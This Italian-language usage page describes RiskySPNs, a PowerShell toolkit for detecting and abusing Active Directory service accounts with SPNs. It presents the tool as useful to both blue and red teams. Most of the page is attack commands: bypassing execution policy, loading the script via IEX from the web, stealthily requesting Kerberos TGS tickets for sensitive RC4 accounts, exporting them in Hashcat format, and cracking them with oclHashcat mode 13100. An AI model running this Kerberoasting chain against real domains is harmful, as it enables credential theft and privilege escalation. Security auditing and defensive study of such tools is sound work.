
Rileva e abusa di SPN rischiosi
RiskySPNs è una raccolta di script PowerShell focalizzata sul rilevamento e l'abuso di account associati a SPN (Service Principal Name). Questo modulo può assistere i blue team nell'identificare SPN potenzialmente rischiosi, nonché i red team nell'escalation dei privilegi sfruttando Kerberos e Active Directory.
Per informazioni dettagliate: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
Oppure carica solo lo script (puoi anche usare IEX dal web)
. .\Find-PotentiallyCrackableAccounts.ps1
Assicurati che Set-ExecutionPolicy sia Unrestricted o Bypass
Get-Help Get-TGSCipher -Full
Tutte le funzioni hanno anche la modalità -Verbose
Trova account vulnerabili
Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$
Genera un report completo e dettagliato sugli account vulnerabili (CISO <3)
Export-PotentiallyCrackableAccounts
Richiedi Kerberos TGS per SPN
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Oppure
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3